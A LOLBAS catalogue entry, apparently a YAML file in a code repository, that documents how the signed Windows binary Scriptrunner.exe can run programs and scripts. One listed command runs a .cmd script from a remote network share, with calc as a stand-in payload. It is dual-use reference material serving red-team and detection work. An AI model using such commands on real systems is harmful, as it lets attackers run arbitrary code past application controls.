LOLBAS/yml/OSBinaries/Scriptrunner.yml

22 lines
671 B
YAML
Raw Normal View History

2018-06-09 00:15:06 +02:00
---
Name: Scriptrunner.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Scriptrunner.exe -appvscript calc.exe
Description: Execute calc.exe.
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Execute the calc.cmd script on the remote share.
Full Path:
- c:\windows\system32\scriptrunner.exe
- c:\windows\sysWOW64\scriptrunner.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/KyleHanslovan/status/914800377580503040
- https://twitter.com/NickTyrer/status/914234924655312896
- https://github.com/MoooKitty/Code-Execution
Notes: Thanks to Nick Tyrer - @NickTyrer